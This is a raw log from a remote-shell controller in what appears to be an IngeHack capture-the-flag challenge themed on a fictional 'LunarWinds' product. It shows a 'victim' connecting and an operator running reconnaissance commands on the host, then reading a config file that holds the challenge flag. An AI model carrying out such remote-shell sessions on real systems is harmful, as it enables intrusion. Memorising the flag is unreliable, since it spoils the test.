NEW VICTIM[192.168.43.27]:ID-k9DYVvClujhAMtP3IzcXxXjoyCHBaa:24362
[!] Connection established with 192.168.43.27

ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
Command> hostname
Awaiting response ...
ASKED FOR CMD

LUNARWINDS
socket error
ASKED FOR CMD
Command> whoami
Awaiting response ...
ASKED FOR CMD

LUNARWINDS\root
socket error
ASKED FOR CMD
Command> dir
Awaiting response ...
ASKED FOR CMD

Volume in drive Z has no label.
socket error

Volume Serial Number is 7062-a15a
socket error

Directory of Z:\Production\LunarWinds\cfg
socket error

  6/1/2021   2:03 PM  <DIR>         .
socket error

  6/1/2021   2:03 PM  <DIR>         ..
socket error

  3/5/2021   1:27 PM     1,056,704  6805.cfg
socket error

  3/5/2021   1:30 PM     1,243,401  6808.cfg
socket error

  3/5/2021   1:27 PM     1,057,299  6811.cfg
socket error

  3/5/2021   1:30 PM     1,253,304  6812.cfg
socket error

  3/5/2021   1:20 PM         9,203  6816.cfg

  3/5/2021   1:34 PM     2,867,717  78k0.cfg
socket error

  3/5/2021   1:30 PM     1,290,540  78k0s.cfg
socket error

  3/5/2021   1:19 PM        17,408  aif.dll
socket error

  3/5/2021   1:19 PM        17,920  aif64.dll
socket error

  3/5/2021   1:19 PM        18,432  amiga.dll
socket error

  3/5/2021   1:19 PM        18,432  amiga64.dll
socket error

  3/5/2021   1:20 PM        19,456  aof.dll

  3/5/2021   1:20 PM        19,968  aof64.dll
socket error

  3/5/2021   1:20 PM        19,968  aout.dll
socket error

  3/5/2021   1:20 PM        19,456  aout64.dll
socket error

  6/1/2021   2:06 PM            38  LWinds.cfg
socket error

  3/5/2021   1:20 PM        14,336  mas.dll
socket error

  3/5/2021   1:20 PM        14,336  mas64.dll
socket error

  3/5/2021   1:19 PM           528  mips-cp0.xml
socket error

  3/5/2021   1:19 PM         1,606  mips-cpu.xml
socket error

  3/5/2021   1:19 PM           707  mips-dsp.xml
socket error

  3/5/2021   1:19 PM         2,177  mips-fpu.xml
socket error

  3/5/2021   1:19 PM           639  mips-lin.xml
socket error

  3/5/2021   1:20 PM        14,336  n64rom.dll
socket error

  3/5/2021   1:20 PM        14,336  n64rom64.dll
socket error

  3/5/2021   1:21 PM        37,888  ne.dll
socket error

  3/5/2021   1:21 PM        37,888  ne64.dll
socket error

  3/5/2021   1:20 PM        26,112  nlm.dll
socket error

  3/5/2021   1:19 PM        25,088  nlm64.dll
socket error

  3/5/2021   1:21 PM        78,848  omf.dll

  3/5/2021   1:21 PM        79,872  omf64.dll
socket error

  3/5/2021   1:20 PM        14,848  os9.dll
socket error

  3/5/2021   1:20 PM        14,848  os964.dll
socket error

  3/5/2021   1:20 PM         8,903  pdfldr.py
socket error

  3/5/2021   1:22 PM       177,152  pe.dll
socket error

  3/5/2021   1:19 PM        44,074  ppc.cfg
socket error

  3/5/2021   1:20 PM         8,554  psx.cfg
socket error

  3/5/2021   1:25 PM       608,991  r32c.cfg
socket error

  3/5/2021   1:19 PM           164  rh850.xml
socket error

  3/5/2021   1:22 PM       320,635  sh3.cfg
socket error

  3/5/2021   1:19 PM         1,817  spc700.cfg
socket error

  3/5/2021   1:26 PM       800,753  st10.cfg
socket error

  3/5/2021   1:19 PM           108  st20.cfg
socket error

  3/5/2021   1:26 PM       930,421  st7.cfg
socket error

  3/5/2021   1:19 PM            71  st9.cfg
socket error

  6/1/2021   2:06 PM       315,392  winds.cfg.exe
socket error

      46 files               12,524,674 bytes
socket error

       2 directories        967,925,760 bytes free
socket error
ASKED FOR CMD
Command> cd
Awaiting response ...
ASKED FOR CMD

Z:\Production\LunarWinds\cfg
socket error
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
Command> type LWinds.cfg
Awaiting response ...
ASKED FOR CMD

IngeHack{lUn4rW1nDs_F1r3w4ll_is_$h1t}
socket error
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
ASKED FOR CMD
Command> 
[!] Exit
         